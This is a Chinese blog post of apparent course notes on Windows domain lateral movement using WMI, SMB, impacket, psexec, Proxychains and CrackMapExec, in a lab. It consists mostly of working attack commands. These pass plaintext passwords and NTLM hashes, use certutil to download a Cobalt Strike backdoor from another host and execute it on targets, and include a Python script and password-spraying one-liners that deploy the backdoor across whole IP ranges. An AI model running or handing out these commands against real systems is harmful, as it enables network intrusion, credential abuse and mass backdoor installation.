wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"

wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe c:/beacon.exe"

2.cscript

内置：(交互式)

上传wmiexec.vbs

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

3.wmiexec-impacket

外部：(交互式&单执行)

wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"

下载后门：

wmiexec ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"

执行后门：

wmiexec ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c c:/beacon.exe"

这里一共是有三种方法，我们常用的就是第三种方法，因为第一种和第二种的局限性比较大

第一种单执行，我们可以在CS里面直接输命令，但是不会得到回显，所以不知道命令有没有成功

这个wmic是windows内置的命令，不需要什么条件，但无回显

第二种交互式不适合在CS里面执行，因为他是交互式的，CS只有在底部能输命令，输完这个命令就直接执行了，无法进行交互，除非是那中图形化的或者能交互的还差不多，并且需要提前把wmiexec.vbs文件上传到win7(已经取得权限的机器)上面，这个文件不大，只有11kb，上传上去还是没啥大问题的

这个cscript也是内置的命令，该方法缺点就是无法在CS上面进行

第三种就比较常用了，就是我们上节课说的套件impacket，本节课会用到wmiexec这个exe，里面也有我们上节课用到的atexec.exe，其他的exe会在后面讲横向移动的其他知识的时候会用到。(并且第一种第二种不支持hash，只支持明文密码，而第三种不仅支持明文还支持hash)

同样的还有py版本的，他俩是一一对应的，只不过exe版本的需要上传到受控机器，这个局限比较大。而py版本的则可以通过利用代理转发，实现在本机执行命令。exe版本就是py版本封装打包之后的产物

这里我们就用py的来演示，首先把代理弄好，这个在上节课说过，这里就不说了。

这里我们利用反向，就是让目标机器去找win7，然后通过转发上线直接上线CS

把转发上线监听器生成的木马上传到WIN7，等会好利用wmi把这个后门下载到目标机器

这里不知道为啥目标机器为win2012报错，然后试了win2008r2的域控发现可以。然后就是利用命令把后门下载到目标机器并执行就会上线CS了

这里因为我的win7没有开网络服务，所以就没有搞接下来的，接下来的就比较简单，就是利用命令下载脚本并执行即可上线CS。

域横向移动-SMB-自带&命令&套件&插件

利用SMB服务可以通过明文或hash传递来远程执行，条件445服务端口开放。

1.psexec

内部：(交互式 windows官方工具)

psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

外部：(交互式外人开发的工具)

psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

插件：

cs-psexec

这个内部的就是windows提供的一个工具，叫pstools，里面就有我么你要用到的psexec，并且也不大就300多k，也是windoes提供的，所以不存在被杀的风险，但是由于是交互式的，所以在CS里面不行，并且执行的命令想要成功还要有管理员权限才可以，也不支持hash

外部的就是我们的套件impacket里面的包含的exe的版本，支持hash的传递，但是不能用CS，所以也是比较难受

插件就是CS上面带的插件

这里有三个，可以都试试。

如果域这里没有填的话，就是用本地用户去登录，写域了就是用域用户去登录

这里也是可以成功上线的

2.smbexec-impacket

外部：(交互式)

smbexec ./administrator:admin!@#45@192.168.3.32

smbexec god/administrator:admin!@#45@192.168.3.32

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

smbexec -hashes :518b98ad4178a53695dc997aa02d455c god/administrator@192.168.3.32smbexec -hashes god/administrator:518b98ad4178a53695dc997aa02d455c@192.168.3.32

这个就是套件里面的py版本

这里我们配置好代理运行，这里也是成功的来到了3.30的cmd窗口

这里我用的本地用户去登陆的，实战中我们本地和域都要去尝试

3.services

内置：(单执行)

services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 create -name shell -display shellexec -path C:\Windows\System32\shell.exe

services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 start -name shell

这个就是利用wondows自带的services去创建一个服务名字为shell，然后把shell绑定上去，但是这个是单执行是没有回显的，也是比较的麻烦，了解一下可以。

域横向移动-工具-Proxychains&CrackMapExec

1、Windows+Proxifier+Python_exp

这里就是利用脚本去批量上线，因为是在本机，所以配合proxifier代理转发

那么这里可能会上线一些主机，那么我们就可以抓取到新上线主机的明文密码和hash，然后再把脚本中的密码和hash修改一下再运行。然后就是修改密码，上线；修改密码，上线。这样会很麻烦，因为要不停的修改，那么接下来就会介绍一款更加便捷的工具。

import os

ips=['192.168.3.21','192.168.3.25','192.168.3.29','192.168.3.28','192.168.3.30','192.168.3.32']

def down():

for ip in ips:

wmi_exec='D:\Myproject\\venv\Scripts\python.exe D:\Myproject\impacket-master\examples\\wmiexec.py ./administrator:admin!@#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe"'%ip

print(wmi_exec)

os.system(wmi_exec)

def zx():

for ip in ips:

wmi_exec='D:\Myproject\\venv\Scripts\python.exe D:\Myproject\impacket-master\examples\\wmiexec.py ./administrator:admin!@#45@%s "c:/4455.exe"'%ip

print(wmi_exec)

os.system(wmi_exec)

if __name__ == '__main__':

down()

zx()

Linux Proxychains使用

我们先说一下linux的代理工具，我们之前用的proxifier是windows用的，在Linux上面用不了，因此推荐一个新的工具Proxychains

安装使用：

Ubuntu 18.04及以上系统的安装与配置

Ubuntu 18.04 + 系统的官方源已经包含proxychains4，直接通过apt/apt-get安装即可。

1.1 安装

sudo apt update

sudo apt install proxychains4

1.2 配置

sudo vim /etc/proxychains4.conf

原文链接：Ubuntu下命令行加速、终端加速、命令行代理的方法/proxychains安装与使用_ubuntu安装proxychains_lyh458的博客-CSDN博客

我这里把端口改成了34280，也就是CS开启的socks端口，ip就写的本机，因为CS的服务端就是本机

代理配置：Proxychains.conf

代理调用：Proxychains 命令

安装完成之后，想要使用这个代理就可以直接Proxychains后面加上命令即可。

Linux+Proxychains+CrackMapExec

然后就是我们的linux配合这个代理工具加上密码喷射工具CrackMapExec进行密码喷射，批量上线CS，上面说那个脚本不方便，这个密码喷射工具就是我们要介绍的好项目

CrackMapExec

Github：GitHub - Porchetta-Industries/CrackMapExec: A swiss army knife for pentesting networks

官方手册：Introduction - CrackMapExec ~ CME WIKI

部分案例：CrackMapExec：一款针对大型Windows活动目录(AD)的后渗透工具 - FreeBuf网络安全行业门户

下载对应release，建立socks连接，设置socks代理，配置规则，调用！

后面不加--local-auth就是用本地用户登录，不加就是与用户登录。加上-x就是可以进行命令执行。

上线CS就是把命令弄成下载后门文件的命令，然后执行后门文件即可

也可以把账号密码写道文档之中，直接利用文档进行密码喷射，用户就用administrator即可，因为不是管理员用户的话也上线不了CS，我这里懒得弄了，就不搞了，有点麻烦我就觉的。

密码喷射域登录：

proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45'

密码喷射本地登录：

proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth

密码喷射本地登录命令执行：

proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'whoami' --local-auth

密码喷射本地登录命令执行上线：

proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe' --local-auth

密码喷射域登录命令执行上线：

proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe'

密码喷射本地&域登录命令执行全自动上线：

proxychains python cme smb 192.168.3.21-32 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe'

proxychains python cme smb 192.168.3.21-32 -u administrator -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe' --local-auth

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/寸_铁/article/detail/822790